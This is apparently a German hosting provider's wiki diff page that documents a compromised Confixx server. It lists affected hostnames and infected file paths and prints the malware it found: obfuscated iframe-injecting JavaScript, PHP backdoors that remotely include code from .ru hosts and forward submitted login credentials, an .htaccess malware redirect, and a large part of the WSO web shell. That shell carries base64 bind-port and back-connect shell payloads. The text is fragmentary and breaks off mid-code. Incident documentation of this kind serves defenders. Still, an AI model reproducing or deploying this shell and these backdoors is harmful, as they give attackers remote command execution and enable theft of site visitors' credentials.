+ | $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; | ||
+ | $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; | ||
+ | echo "<h1>Network tools</h1><div class=content> | ||
+ | <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'> | ||
+ | <span>Bind port to /bin/sh</span><br/> | ||
+ | Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'> | ||
+ | </form> | ||
+ | <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'> | ||
+ | <span>Back-connect to</span><br/> | ||
+ | Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'> | ||
+ | </form><br>"; | ||
+ | if(isset($_POST['p1'])) { | ||
+ | function cf($f,$t) { | ||
+ | $w=@fopen($f,"w") or @function_exists('file_put_contents'); | ||
+ | if($w) { | ||
+ | @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); | ||
+ | @fclose($w); | ||
+ | } | ||
+ | } | ||
+ | if($_POST['p1'] == 'bpc') { | ||
+ | cf("/tmp/bp.c",$bind_port_c); | ||
+ | $â = ex("gcc -o /tmp/bp /tmp/bp.c"); | ||
+ | @unlink("/tmp/bp.c"); | ||
+ | $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>"; | ||
+ | } | ||
+ | if($_POST['p1'] == 'bpp') { | ||
+ | cf("/tmp/bp.pl",$bind_port_p); | ||
+ | $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>"; | ||
+ | } | ||
+ | if($_POST['p1'] == 'bcc') { | ||
+ | cf("/tmp/bc.c",$back_connect_c); | ||
+ | $â = ex("gcc -o /tmp/bc /tmp/bc.c"); | ||
+ | @unlink("/tmp/bc.c"); | ||
+ | $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>"; | ||
+ | } | ||
+ | if($_POST['p1'] == 'bcp') { | ||
+ | cf("/tmp/bc.pl",$back_connect_p); | ||
+ | $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>"; | ||
+ | } | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | if( empty($_POST['a']) ) | ||
+ | if(isset($â) && function_exists('action' . $â)) | ||
+ | $_POST['a'] = $â; | ||
+ | else | ||
+ | $_POST['a'] = 'FilesMan'; | ||
+ | if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) | ||
+ | call_user_func('action' . $_POST['a']); | ||
+ | ?> | ||
</syntaxhighlight> | </syntaxhighlight> | ||
Zeile 2.800: | Zeile 4.415: | ||
login-32.hoststar.ch * | login-32.hoststar.ch * | ||
− | login-33.hoststar.ch | + | login-33.hoststar.ch * |
− | login-34.hoststar.ch | + | login-34.hoststar.ch * |
− | login-35.hoststar.ch | + | login-35.hoststar.ch * |
− | login-36.hoststar.ch | + | login-36.hoststar.ch * |
− | login-37.hoststar.ch | + | login-37.hoststar.ch * |
− | login-38.hoststar.ch | + | login-38.hoststar.ch * |
− | login-4.hoststar.ch | + | login-4.hoststar.ch * |
− | login-54.hoststar.ch | + | login-54.hoststar.ch * |
− | login-6.hoststar.ch | + | login-6.hoststar.ch * |
− | login-62.hoststar.ch | + | login-62.hoststar.ch * |
− | login-66.hoststar.ch | + | login-66.hoststar.ch * |
− | login-7.hoststar.ch | + | login-7.hoststar.ch * |
− | login-75.hoststar.ch | + | login-75.hoststar.ch * |
− | login-76.hoststar.ch | + | login-76.hoststar.ch * |
− | login-77.hoststar.ch | + | login-77.hoststar.ch * |
− | login-78.hoststar.ch | + | login-78.hoststar.ch * |
− | login-79.hoststar.ch | + | login-79.hoststar.ch * |
− | login-8.hoststar.ch | + | login-8.hoststar.ch * |
− | login-9.hoststar.ch | + | login-9.hoststar.ch * |
− | tux27.hoststar.ch | + | tux27.hoststar.ch * |
− | tux33.hoststar.ch | + | tux33.hoststar.ch * |
tux9.hoststar.ch | tux9.hoststar.ch | ||
Zeile 2.866: | Zeile 4.481: | ||
3.3.5 | 3.3.5 | ||
− | login-1.hoststar.at | + | login-1.hoststar.at * |
login-102.hoststar.ch | login-102.hoststar.ch |
Version vom 17. September 2015, 14:59 Uhr
Hacked Confixx
grep for new files:
cat new_files.log | grep -v 'png$' | grep -v 'gif$' | grep -v 'jpg$' | grep -v 'bmp$' | grep -v 'phpt$' | sed ':a;N;$!ba;s/\n/ /g'
login-6.hoststar.ch:
some informations: http://lukewelling.com/category/spyware/
http://forums.jaguarpc.com/hosting-talk-chit-chat/13305-any-ideas-about-hack.html
/home/www/confixx/html/webapps/zencart/index.de.html:
/home/www/confixx/html/webapps/xrms/index.de.html:
/home/www/confixx/html/webapps/xoops/index.de.html:
/home/www/confixx/html/webapps/xaraya/index.de.html:
/home/www/confixx/html/webapps/weberp/index.de.html:
/home/www/confixx/html/webapps/wbbook/index.de.html:
/home/www/confixx/html/webapps/vstat/index.de.html:
... haben aber anderen code vorhanden ...
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>
<div style="visibility: hidden; position: absolute; left: 1; top: 1">iframe src="http://user19.iframe.ru/?s=1" fraborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>
Search for "</p><a href=.*</a>" of for class=giepoaytr
you can use follow list to find some of them: http://www.maxispecialisten.se/punbb-1.2.7/sess31002/lk.txt http://www.afdex.com/common/board/data/Automatic_Multi_Stage_Cold_Forging/sess31002/lk.txt
/home/www/confixx/html/webapps/weberp/index.de.html:
<a href="http://gallery.ransomed.us/albums/album06/SMS-%2BSamsung%2BSGH-S500.shtml" class=giepoaytr title="SMS- Samsung SGH-S500" target=_blank>SMS- Samsung SGH-S500</a>
/home/www/confixx/html/webapps/wbbook/index.de.html:
<a href="http://www.woltlab.de/products/burning_book/demo/">http://www.woltlab.de/products/burning_book/demo/</a> <a href="http://www.flyfic.renaissance-ghost.net/stories/graphospasm/images/no%2Bcd%2Bcrack%2Btonka.jsp" class=giepoaytr title="no cd crack tonka">no cd crack tonka</a>
/home/www/confixx/html/webapps/vstat/index.de.html:
<a href="http://www.geraldlee.net/nm/jak%2Bm%2Bmio%2Bpl.phtml" class=giepoaytr target=_blank>jak m mio pl</a>
/home/www/confixx/html/webapps/typo/index.de.html:
<a href="http://www.konline.org/alber/gallery/albums/album02/Underground2-Crack.jsp" class=giepoaytr>Underground2-Crack</a>
/home/www/confixx/html/webapps/tsep/index.de.html:
<a href="http://www.squarefc.com/gallery/content/Mascot/diablo%202%20downlaod.phtml" class=giepoaytr>diablo 2 downlaod</a>
/home/www/confixx/html/webapps/topdownloads/index.de.html:
<a href="http://www.artmotion.between-worlds.net/iB_html/non-cgi/Skin/SKIN-2/grifin-barbie.html" class=giepoaytr title="grifin barbie">grifin barbie</a>
/home/www/confixx/html/webapps/template/index.de.html:
<a href="http://www.rockpoppyprincess.pinkgraffiti.com/cart/images/couter.strike1.6.dowload.shtml" class=giepoaytr>couter strike1.6 dowload</a>
/home/www/confixx/html/webapps/squirrelmail/index.de.html:
<a href="http://mkweb.mattkennedy.us/modules/news/images/topics/Warcraft_MAPHACK_v_1.20.shtml" class=giepoaytr>Warcraft MAPHACK v 1.20</a>
/home/www/confixx/html/webapps/zencart/guest.php:
/home/www/confixx/html/webapps/xrms/configs.php:
/home/www/confixx/html/webapps/xoops/include.php:
/home/www/confixx/html/webapps/xaraya/date.php:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
open data from "user7.htmltags.ru"
/home/www/confixx/html/webapps/zencart/create.php:
/home/www/confixx/html/webapps/xrms/messages.php:
/home/www/confixx/html/webapps/xoops/includes.php:
/home/www/confixx/html/webapps/xaraya/report.php:
<?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?>
open data from "http://bis.iframe.ru/master.php?r_addr="
/home/www/confixx/html/webapps/zencart/.htaccess:
/home/www/confixx/html/webapps/xrms/.htaccess:
/home/www/confixx/html/webapps/xoops/.htaccess:
/home/www/confixx/html/webapps/xaraya/.htaccess:
Options -MultiViews ErrorDocument 404 //webapps/zencart/guest.php
allways force an 404 error and redirect to malware file
/home/www/confixx/html/skins/mskin_19/small_icons/properties.php
<?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?>
/home/www/confixx/html/skins/mskin_19/small_icons/layout.php
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
login-101.hoststar.ch
<?php //-----------------Password--------------------- $â297a57a5a743894a0e4a801fc3"; //admin $â = "#fff"; $â = true; $â = 'UTF-8'; $â = 'FilesMan'; $â = md5($_SERVER['HTTP_USER_AGENT']); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { prototype(md5($_SERVER['HTTP_HOST'])."key", $â); } if(empty($_POST['charset'])) $_POST['charset'] = $â; if (!isset($_POST['ne'])) { if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); } function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);} @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('VERSION', '4.1.0'); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } if(!empty($â if(isset($_POST['pass']) && (md5($_POST['pass']) == $â rototype(md5($_SERVER['HTTP_HOST']), $â f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â ardLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; function hardHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['â']; global $â; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title> <style> body {background-color:#060a10;color:#e1e1e1;} body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;} table.info {color:#C3C3C3;background-color:#060a10;} span,h1,a {color:$â !important;} span {font-weight:bolder;} h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;} div.content {padding:5px;margin-left:5px;background-color:#060a10;} a {text-decoration:none;} a:hover {text-decoration:underline;} .ml1 {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;} .bigarea {width:100%;height:250px; } input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;} form {margin:0px;} #toolsTbl {text-align:center;} .toolsInp {width:300px} .main th {text-align:left;background-color:#060a10;} .main tr:hover{background-color:#354252;} .main td, th{vertical-align:middle;} .l1 {background-color:#1e252e;} pre {font:9pt Courier New;} </style> <script> var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; var a_ = '" . htmlspecialchars(@$_POST['a']) ."' var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; var d = document; function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);} function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;} function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;} function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $â) $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['â)) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'. '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'. '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>'; } function hardFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>"; echo " </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%> <tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? 